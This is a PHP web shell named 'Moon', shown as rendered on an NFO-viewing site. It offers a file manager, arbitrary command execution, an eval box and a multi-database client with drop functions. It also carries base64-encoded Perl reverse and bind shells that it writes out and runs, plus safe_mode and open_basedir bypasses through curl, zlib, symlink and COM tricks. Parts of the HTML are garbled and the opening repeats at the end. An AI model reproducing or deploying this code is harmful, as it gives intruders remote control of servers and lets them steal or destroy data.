NFOmation.net - Your Ultimate NFO Upload Resource! Viewing NFO file: sh.PhP._00.nfo sh.PhP._00
<?php
session_start();
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
$slash="\\";
}else{
$slash="/";
}
if ($_REQUEST['address']){
if(is_readable($_REQUEST['address'])){
chdir($_REQUEST['address']);}}
$me=$_SERVER['PHP_SELF'];
$formp="<form method=post action='".$me."'>";
$formg="<form method=get action='".$me."'>";
$nowaddress='';
if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) {
move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"]);
$ifupload="Uploaded :D";
}
if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){
chmod($_POST['chmode'],"0".$_POST['chmodenum']);
}
$head='<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Moon</title>
</head><body topmargin="0" leftmargin="0" rightmargin="0"
bgcolor="#f2f2f2">
>
collapse; border-style: solid; border-width: 1px">
File
Manger -- Command Execute -- Back Connect --
BypasS Command eXecute(SF-DF) --
BypasS Directory --
Eval -- Data Base --
Server Information
<table id="table2" style="border-collapse: collapse; border-style:
solid;" width="1000" bgcolor="#eaeaea" border="1" bordercolor="#c6c6c6"
cellpadding="0"><tbody>>
border-width:1px; margin-top: 20px; margin-bottom: 20px;
border-collapse: collapse" width="950" border="1" bordercolor="#cdcdcd"
height="620" bordercolorlight="#CDCDCD" bordercolordark="#CDCDCD"><tbody>
<td style="border: 1px solid rgb(198, 198, 198);"
width="950" bgcolor="#e7e3de" height="590" valign="top">';
$end=' </tbody>>
style="margin-top: 0pt; margin-bottom: 0pt" align="center">>
style="font-size: 9pt">Coded by Amin Shokohi (Pejvak)>
target="_blank>iTSecTeam.com</tbody></html>';
$deny=$head." Oh My God! Permission Denied".$end;
if ($_GET['do']=="edit" && $_GET['filename']!="dir"){
if(is_readable($_GET['address'].$_GET['filename'])){
$opedit=fopen($_GET['address'].$_GET['filename'],"r");
while(!feof($opedit))
$data.=fread($opedit,9999);
fclose($opedit);
echo $head.$formp.$nowaddress.'File Name : '.$_GET['address'].$_GET['filename'].'< >>
r><textarea rows="19" name="fedit" cols="87">'.htmlspecialchars("$data", ENT_QUOTES).'</textarea>>
value="'.$_GET['filename'].'" name=namefe></form>'.$end;exit;
}else{echo $deny;exit;}}
function sizee($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
function deleteDirectory($dir) {
if (!file_exists($dir)) return true;
if (!is_dir($dir) || is_link($dir)) return unlink($dir);
foreach (scandir($dir) as $item) {
if ($item == '.' || $item == '..') continue;
if (!deleteDirectory($dir . "/" . $item)) {
chmod($dir . "/" . $item, 0777);
if (!deleteDirectory($dir . "/" . $item)) return false;
};}return rmdir($dir);}
if($_GET['do']=="rename"){
echo $head.$formp.$nowaddress.'>
type=hidden name=addressren value='.$_GET['address'].$_GET['filename'].'> To >
type=submit value=" Save "></form>'.$end;exit;
}
if ($_REQUEST['cdirname']){
if(is_writable($_REQUEST['address'])){
mkdir($_REQUEST['address'].$slash.$_REQUEST['cdirname'],"0777");}else{echo $deny;exit;}}
function bcn($ipbc,$pbc){
$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
$opbc=fopen("bcc.pl","w");
fwrite($opbc,base64_decode($bcperl));
fclose($opbc);
system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions >>
Or Safe Mode");
}
function wbp($wb){
$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
$opwb=fopen("wbp.pl","w");
fwrite($opwb,base64_decode($wbp));
fclose($opwb);
echo getcwd();
system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe >>
Mode");
}
function lbp($wb){
$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
$oplb=fopen("lbp.pl","w");
fwrite($oplb,base64_decode($lbp));
fclose($oplb);
system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe >>
Mode");
}
if($_REQUEST['portbw']){
wbp($_REQUEST['portbw']);
}if($_REQUEST['portbl']){
lbp($_REQUEST['portbl']);
}
if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);
}
if($_REQUEST['do']=="bc"){
echo $head.$formp."Usage : Run Netcat In Your Machin And Execute This Command( Disable >>
Firewall !!! )<hr><<<<<< Back Connect >>>>>>Ip Address : >
value=".$_SERVER['REMOTE_ADDR'] ."> Port : >
value=Connect></form>".$formp."Usage : Run Netcat In Your Machin And Execute This Command( >>
Disable Firewall !!! )<hr><<<<<< Windows Bind Port >>>>>>Port : >
name=portbw value=5555></form>".$formp."Usage >>
: Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<hr><<<<<< >>
Linux Bind Port >>>>>>Port : >>
/form>".$end;exit;
}
if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){
if(is_writable($_REQUEST['cpyto'])){
copy($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto']);
}else{echo $deny;exit;}}
if($_REQUEST['cfilename']){
echo $head.$formp.$nowaddress.'Create File<textarea rows="19" >>
name="nf4cs" cols="87"></textarea>>
type=submit value=" Create "></form>'.$end;exit;
}
if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){
if(is_writable($_REQUEST['address'])){
$ofile4c=fopen($_REQUEST['address'].$slash.$_REQUEST['nf4c'],"w");
fwrite($ofile4c,$_REQUEST['nf4cs']);
fclose($ofile4c);
}else{echo $deny;exit;}}
function sqlclienT(){
global $t,$errorbox,$et,$hcwd;
if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && >>
!empty($_REQUEST['querY'])){
$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR']; >>
query=$_REQUEST['querY'];
$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
$_SESSION=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION=$_REQUEST['p >>
sS'];$_SESSION=$_REQUEST['useR'];
}
if (isset ($_GET)){
$getdb=$_GET;
$_SESSION[db]=$getdb;
$query="SHOW TABLES";
$res=querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,$_SESSION[db],$query);
}
elseif (isset ($_GET)){
$tbl=$_GET;
$_SESSION[tbl]=$tbl;
$query="SELECT * FROM `$tbl`";
$res=querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,$_SESSION[db],$query);
}
elseif (isset ($_GET[drop_db])){
$getdb=$_GET[drop_db];
$_SESSION[db]=$getdb;
$query="DROP DATABASE `$getdb`";
querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,'',$query);
$res=querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,'','SHOW DATABASES');
}
elseif (isset ($_GET[drop_tbl])){
$getbl=$_GET[drop_tbl];
$query="DROP TABLE `$getbl`";
querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,$_SESSION[db],$query);
$res=querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,$_SESSION[db],'SHOW TABLES');
}
elseif (isset ($_GET[drop_row])){
$getrow=$_GET[drop_row];
$getclm=$_GET[clm];
$query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";
$tbl=$_SESSION[tbl];
querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,$_SESSION[db],$query);
$res=querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,$_SESSION[db],"SELECT * >>
FROM `$tbl`");
}
else
$res=querY($type,$server,$user,$pass,$db,$query);
if($res){
$res=htmlspecialchars($res);
$row=array ();
$title=explode('[+][+][+]',$res);
$trow=explode('[-][-][-]',$title[1]);
$row=explode('|+|+|+|+|+|',$title[0]);
$data=array();
$field=$trow[count($trow)-2];
if (strstr($trow[0],'Database')!='')
$obj='db';
elseif (substr($trow[0],0,6)=='Tables')
$obj='tbl';
else
$obj='row';
$i=0;
foreach ($row as $a){
if($a!='')
$data[$i++]=explode('|-|-|-|-|-|',$a);
}
echo ">
er-collapse: collapse'>";
foreach ($trow as $ti)
echo "$ti";
echo "";
$j=0;
while ($data[$j]){
echo "";
foreach ($data[$j++] as $dr){
echo "";
if($obj!='row') echo "";
echo $dr;
if($obj!='row') echo "";
echo "";
}
echo "<a href='$_SERVER?do=db&drop_$obj=$dr";
if($obj=='row')
echo "&clm=$field";
echo "'>Drop";
}
echo "";
}
if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
echo "<form name=client method='POST' action='$_SERVER?do=db'>>
width='400' style='border-collapse: collapse' id='table1' bordercolor='#C6C6C6' cellpadding='2'>>
width='400' colspan='2' bgcolor='#F2F2F2'>>
color='#433934'>Connect to Database>
face='Arial' size='2'>DB Type:<option >>
valut=MySQL onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='MySQL')echo 'selected';
echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='MSSQL')echo 'selected';
echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";
if ($_REQUEST['typE']=='Oracle')echo 'selected';
echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';
echo ">PostgreSQL</option><option valut=DB2 onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='DB2')echo 'selected';
echo ">IBM DB2</option>>
size='2'>Server Address:<input type=text value='";
if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost';
echo "' name=serveR size=35>>
size='2'>Username:<input type=text name=useR value='";
if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root';
echo "' size=35>Password >>
<input type=text value='";
if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123';
echo "' name=pasS size=35>>
r'>Submit a Query>
width='150' bgcolor='#EAEAEA'>DB Name:>
bgcolor='#EAEAEA'><input type=text value='";
if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);
echo "' name=dB size=35>>
size='2'>Query:<textarea name=querY rows=5 cols=27>";
if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES';
echo "</textarea>$hcwd>
type=submit value='Submit' style='float: right'></form>$et";
}
function querY($type,$host,$user,$pass,$db='',$query){
$res='';
switch($type){
case 'MySQL':
if(!function_exists('mysql_connect'))return 0;
$link=mysql_connect($host,$user,$pass);
if($link){
if(!empty($db))mysql_select_db($db,$link);
$result=mysql_query($query,$link);
if ($result!=1){
while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<mysql_num_fields($result);$i++)
$res.=mysql_field_name($result,$i).'[-][-][-]';
}
mysql_close($link);
return $res;
}
break;
case 'MSSQL':
if(!function_exists('mssql_connect'))return 0;
$link=mssql_connect($host,$user,$pass);
if($link){
if(!empty($db))mssql_select_db($db,$link);
$result=mssql_query($query,$link);
while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<mssql_num_fields($result);$i++)
$res.=mssql_field_name($result,$i).'[-][-][-]';
mssql_close($link);
return $res;
}
break;
case 'Oracle':
if(!function_exists('ocilogon'))return 0;
$link=ocilogon($user,$pass,$db);
if($link){
$stm=ociparse($link,$query);
ociexecute($stm,OCI_DEFAULT);
while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).' >>
+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<oci_num_fields($stm);$i++)
$res.=oci_field_name($stm,$i).'[-][-][-]';
return $res;
}
break;
case 'PostgreSQL':
if(!function_exists('pg_connect'))return 0;
$link=pg_connect("host=$host dbname=$db user=$user password=$pass");
if($link){
$result=pg_query($link,$query);
while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<pg_num_fields($result);$i++)
$res.=pg_field_name($result,$i).'[-][-][-]';
pg_close($link);
return $res;
}
break;
case 'DB2':
if(!function_exists('db2_connect'))return 0;
$link=db2_connect($db,$user,$pass);
if($link){
$result=db2_exec($link,$query);
while($data=db2_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<db2_num_fields($result);$i++)
$res.=db2_field_name($result,$i).'[-][-][-]';
db2_close($link);
return $res;
}
break;
}
return 0;
}
function bywsym($file){
if(!function_exists('symlink')){echo "Function Symlink Not Exist";}
if(!is_writable("."))
die("not writable directory");
$level=0;
for($as=0;$as<$fakedep;$as++){
if(!file_exists($fakedir))
mkdir($fakedir);
chdir($fakedir);
}
while(1<$as--) chdir("..");
$hardstyle = explode("/", $file);
for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$as++;
}}
$as++;
while($as--)
chdir("..");
@rmdir("fakesymlink");
@unlink("fakesymlink");
@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
while(1)
if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
else $num++;
@unlink("fakesymlink");
mkdir("fakesymlink");
}
function bypcu($file){
$level=0;
if(!file_exists("file:"))
mkdir("file:");
chdir("file:");
$level++;
$hardstyle = explode("/", $file);
for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$level++;
}
}
while($level--) chdir("..");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
echo ' <textarea rows="40" cols="120">';
if(FALSE==curl_exec($ch))
die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
echo ' </textarea> ';
curl_close($ch);
}
if ($_REQUEST['bypcu']){
bypcu($_REQUEST['bypcu']);
}
if($_REQUEST['do']=="bypasscmd"){
if($_POST['bycw']){
echo $_POST['bycw'];
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll');
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw']."");
$stdout = $exec->StdOut();
$stcom = $stdout->ReadAll();}
echo $head.'<textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){pass >>
hru("\\".$_POST['byws']);} echo $stcom.'</textarea><hr>Bypass Safe_Mode And Disable_Functions >>
In Windows Server>
cellpadding="5">>
10pt; font-weight:700">'.$formp.'Command >
width="750"></form>Bypass >>
Safe_Mode Windows Server>
id="table4" cellpadding="5">>
style="font-size: 10pt; font-weight:700">'.$formp.'Command >
name=byws size=50>< >>
form>'.$end;exit;;
}
if($_REQUEST['do']=="bypassdir"){
if($_POST['byoc']){
if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){
$bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder";
}else{$bopens="Can Not Bypass This";}
}
if($_POST['byfc']){
curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__);
$debfc=curl_exec($ch);
}
if($_POST['byetc']){
for($bye=0;$bye<40000;$bye++){ //cat /etc/passwd
$sbep =$sbep. posix_getpwuid($bye);
}}
if($_POST['byfc9']){
echo "not sucsfull";
}
if($_REQUEST['bysyml']){
$file=$_REQUEST['bysyml'];
bywsym($file);
}
echo $head.'<textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){pass >>
hru("\\".$_POST['byws']);}if(isset($sbep)){for($fbe=0;$fbe<count($sbep);$fbe++){echo $sbep[$fbe];}} >>
if(isset($debfc)){var_dump($debfc);} echo $bopens.'</textarea><hr>Bypass Safe_Mode And >>
Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2>
style="border-collapse: collapse" id="table4" cellpadding="5">'.$f >>
rmp.'>
font-weight:700">Address File >
type=submit value ="read"></form><hr>Bypass Open_basedir And Read File With Bug Curl >>
Worked In PHP 4.4.2 and 5.1.4>
id="table4" cellpadding="5">>
style="font-size: 10pt; font-weight:700">'.$formp.'Address File >
name=byfc size=50>< >>
form><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... >>
5.2.9>
width="200" align="right" valign="top"> >>
.$formp.'Address File >
="eXecute"></form><hr>Bypass >>
/Etc/Passwd'.$formp.'>
value="lol"></form><hr>Bypass With ini_restore'.$formp.'>
type=submit value ="Read File">>
value="bypassdir"></form><hr>Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink>
border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5">>
width="200" align="right" valign="top"> >>
.$formp.'>
File"></f >>
rm><hr>'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... >>
5.2.9>
width="200" align="right" valign="top"> >>
.$formp.'>
File"></form>'.$end;exit;;
}
if($_POST['nameren'] && $_POST['addressren']){
if(is_writable($_REQUEST['addressren'])){
rename($_POST['addressren'],$_POST['nameren']);}else{echo $deny;exit;}
}
if($_GET['do']=="delete"){
if ($_GET['type']=="dir"){
if(is_writable($_REQUEST['address'])){
$dir=$_GET['address'].$_GET['filename'];
deleteDirectory($dir);
}elseif($_GET['type']=="file"){
if(is_writable($_GET['address'].$_GET['filename'])){
unlink($_GET['address'].$_GET['filename']);}else{echo $deny;exit;}
}
}}
if($_POST['fedit'] && $_POST['namefe']){
if(is_writable($_REQUEST['address'])){
$opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w");
echo bazam;
fwrite($opensave,$_POST['fedit']);
fclose($opensave);}else{echo $deny;exit;}
}
if ($_POST['evalsource']){
eval($_POST['evalsource']);
}
if($_GET['do']=="eval"){
echo $head.$formp.$nowaddress.'<textarea rows="19" name="evalsource" cols="87"></t >>
xtarea></form>'.$end;exit;
}
if($_GET['do']=="info"){
if(ini_get('safe_mode')){
$safe_modes="On";
}else{
$safe_modes="Off";
}
if(ini_get('disable_functions')){
$disablef=ini_get('disable_functions');
}else{
$disablef="All Functions Enable";
}
if(ini_get('register_globals')){
$registerg="Enable";
}else{
$registerg="disable";
}
if(extension_loaded('curl')){
$curls="Enable";
}else{
$curls="disable";
}
if(@function_exists('mysql_connect')){
$db_on = "Mysql : On";
};
if(@function_exists('mssql_connect')){
$db_on = "Mssql : On";
};
if(@function_exists('pg_connect')){
$db_on = "PostgreSQL : On";
};if(@function_exists('ocilogon')){
$db_on = "Oracle : On";
};
echo $head."Operating System : ".php_uname()."Server Name : >>
".$_SERVER['HTTP_HOST']."Disable_Functions : ".$disablef."Safe_Mode : ".$safe_modes."Openbase_dir >>
: ".ini_get('openbase_dir')."Php Version : ".phpversion()."Free Space : ".sizee(disk_free_sp >>
ce("/"))."Total Space : ".sizee(disk_total_space("/"))."Register_Globals : ".$registerg."Curl >>
: ".$curls."Database ".$db_on."Server Name : ".$_SERVER['HTTP_HOST']."Admin Server : >>
".$_SERVER['SERVER_ADMIN'].$end;
exit;
}
if ($_GET['do']=="cmd"){
echo $head.'
<form method=get action="'.$me.'">
<textarea rows="19" name="S1" cols="87">';if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){
echo $_GET['execmethod']($_GET['command']);}
if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){
popen($_GET['command'],"r");}
echo'</textarea>
>
name=execmethod>
<option value="system">System</option> <option value="exec">Exec</option> <option value="passthr >>
">Passthru</option><option value="popen">popen</option>
</form>'.$end;exit;}
if($_GET['do']=="db"){
echo $head;sqlclienT();echo $end;
exit;
}
if($_REQUEST['file2ch'] && $_REQUEST['chmodnow']){
$chmodnum2=$_REQUEST['chmodnow'];
chmod($_REQUEST['file2ch'],"0".$chmodnum2);
}
if($_GET['do']=="chmod"){
echo $head.$formg.$nowaddress."Chmod>
value='".$_REQUEST['address'].$_REQUEST['filename']."'> To >
type=submit value=Set></form>".$end;exit;
}
if($_GET['do']=="edit"){
if($_GET['filename']=="dir"){
if(is_readable($_GET['address'].$_GET['filew'])){
chdir($_GET['address'].$_GET['filew']);}else{echo $deny;exit;}
}}
$araddresss=explode($slash,getcwd());
$matharrayy=count($araddresss)-1;
$addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss);
for($countback=0;$countback<count($addr1backk);$countback++){
$arraybacke[$countback]=$slash.$addr1backk[$countback];
$backdirunixx=$backdirunixx.$slash.$addr1backk[$countback];
}
if ($slash=="\\"){
$countback=null;
$backdirwin=null;
for($countback=1;$countback<count($addr1backk);$countback++){
$backdirwin=$backdirwin."\\".$addr1backk[$countback];}
$backdirwin=$addr1backk[0].$backdirwin;
$backaddresss=$backdirwin;
}else{
$countback=null;
$backdirwin=null;
for($countback=1;$countback<count($addr1backk);$countback++){
$backdirwin=$backdirwin."/".$addr1backk[$countback];}
$backdirwin=$addr1backk[0].$backdirwin;
$backaddresss=$backdirwin;
var_dump($backaddresss);
$backaddresss=str_replace("\\","/",$backaddresss);
}
function calc_dir_size($path)
{
$size = 0;
if ($handle = opendir($path))
{
while (false !== ($entry = readdir($handle)))
{
$current_path = $path . '/' . $entry;
if ($entry != '.' && $entry != '..' && !is_link($current_path))
{
if (is_file($current_path))
$size += filesize($current_path);
elseif (is_dir($current_path))
$size = calc_dir_size($current_path);
}
}
}
closedir($handle);
return $size;
}
if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];}
if($cwd==''){$cwd=getcwd();}$nowaddress='';
$ad=getcwd();
$hand=opendir("$ad");
while (false !== ($fileee = readdir($hand))) {
if ($fileee != "." && $fileee != "..") {
if (filetype($fileee)=="dir"){
$fil=$fil.'>
bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
>
style="font-size: 9pt">'.$ >>
ileee.'
'.date("y/m/d", >>
filectime($fileee)).'>
9pt">'.substr(sprintf('%o', >>
fileperms($cwd.$slash."$fileee")), -3).'>
face="Tahoma" style="font-size: 9pt">>
style="font-size: 9pt">Ren
>
e&type=dir&address='.$cwd.$slash.'&filename='.$fileee.'">Del'
;}
else{
$file=$file.'>
bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
>
style="font-size: 9pt">'.$fileee.'</ >>
pan>
'.sizee(filesize( >>
fileee)).'>
9pt">'.date("y/m/d", filectime($fileee)).'>
face="Tahoma" style="font-size: 9pt">>
>'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'>
width="30">>
ame='.$fileee.'">Edit>
9pt">Ren
>
e&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">Del'
;}
}
}
echo $head.'
>
dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
>
style="font-size: 9pt">Now Directory : '.$backaddresss.'>
ress='.$backaddresss.'">Back
'.$fil.$file.'
>
border-top-width: 1px; border-bottom: 1px solid #808080">
'.$formg.'Change Directory
>
border-bottom: 1px solid #808080">>
value="Go"></form>
>
border-top-width: 1px; border-bottom: 1px solid #808080">
Upload --->
>
border-bottom: 1px solid #808080">
<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
'.$ifupload.'</form>
>
border-top-width: 1px; border-bottom: 1px solid #808080">
'.$formp.'Chmod ----> File :
>
border-bottom: 1px solid #808080">
<form method=post action=/now2.php>>
name=chmode> Permission : >
Ok "></form>
>
border-top-width: 1px; border-bottom: 1px solid #808080">
'.$formp.'Create Dir ----> Dirctory Name
>
border-bottom: 1px solid #808080">
'.$nowaddress.' </form>
>
border-top-width: 1px; border-bottom: 1px solid #808080">
'.$formp.'Create File ----> Name File
>
border-bottom: 1px solid #808080">
'.$nowaddress.' >
type=submit value=" Create "></form>
'.$formp.'Copy ----> File :
To Directory >
=Copy></form>
<hr></tbody>
Coded by Amin Shokohi (Pejvak)>
.itsecteam.com" target="_blank">iTSecTeam.com</tbody></tabl >>
></html>';
This NFO File was rendered by NFOmation.net
<?php
session_start();
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
$slash="\\";
}else{
$slash="/";
}
if ($_REQUEST['address']){
if(is_readable($_REQUEST['address'])){
chdir($_REQUEST['address']);}}
$me=$_SERVER['PHP_SELF'];
$formp="<form method=post action='".$me."'>";
$formg="<form method=get action='".$me."'>";
$nowaddress='';
if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) {
move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"]);
$ifupload="Uploaded :D";
}
if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){
chmod($_POST['chmode'],"0".$_POST['chmodenum']);
}
$head='<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Moon</title>
</head><body topmargin="0" leftmargin="0" rightmargin="0"
bgcolor="#f2f2f2">
>
collapse; border-style: solid; border-width: 1px">
File
Manger -- Command Execute -- Back Connect --
BypasS Command eXecute(SF-DF) --
BypasS Directory --
Eval -- Data Base --
Server Information
<table id="table2" style="border-collapse: collapse; border-style:
solid;" width="1000" bgcolor="#eaeaea" border="1" bordercolor="#c6c6c6"
cellpadding="0"><tbody>>
border-width:1px; margin-top: 20px; margin-bottom: 20px;
border-collapse: collapse" width="950" border="1" bordercolor="#cdcdcd"
height="620" bordercolorlight="#CDCDCD" bordercolordark="#CDCDCD"><tbody>
<td style="border: 1px solid rgb(198, 198, 198);"
width="950" bgcolor="#e7e3de" height="590" valign="top">';
$end=' </tbody>>
